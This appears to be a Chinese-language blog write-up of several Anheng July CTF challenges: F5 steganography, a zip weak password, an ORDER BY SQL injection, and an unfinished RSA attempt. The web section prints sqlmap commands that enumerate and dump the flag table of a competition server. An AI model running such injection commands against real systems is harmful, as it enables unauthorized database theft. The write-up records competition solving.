安恒7月

gmpy还是安不上，死亡了

misc-刷新过的图片

描述：浏览图片的时候刷新键有没有用呢

由题目可知是f5隐写，工具下载地址
https://github.com/matthewgao/F5-steganography
随后开cmd，cd到该工具所在位置，执行

java Extract D:\写着玩的CTF\Misc.jpg

然后查看output.txt
可知是一个zip文件，改后缀解压发现需要解压密码，第一反应伪加密，更改加密位后解压成功

flag{96efd0a2037d06f34199e921079778ee}

misc-弱口令

体现和大佬差距的一道题（

我：注释里面写的什么玩意，空白的
大佬：复制下来十六进制转摩斯电码转字符
我：

今年二月也遇到过差不多的，我他娘的怎么就不长记性呢……

MIGO(392265969) 18:04:29
HELL0FORUM

反正解压开了（……………………………………………）
群里偷的图，打扰了（

web-order

描述：这是一题关于order的注入，很简单的哦！同学们尝试下注入吧！

总之确认了order字段可以注入……

Sqlmap -u "http://101.71.29.5:10004/?order=null" --dbs

Sqlmap -u "http://101.71.29.5:10004/?order=null" --tables -D shop

image.png

Sqlmap -u "http://101.71.29.5:10004/?order=null" --columns -T flag -D shop

Sqlmap -u "http://101.71.29.5:10004/?order=null" --dump -T flag -C "flag"

 flag{666_0rdorby_you_can}

crypto-dangerous rsa

gmpy折腾了一天安不上……打扰了.jpg
用pow的话精度不够，出来的d是

13040004482819561212997163135581139583435594906504375913702521067276967927455866516190265344

也就是说最多到这里↓

flag{0ä

来自大佬的支援，是神秘力量↓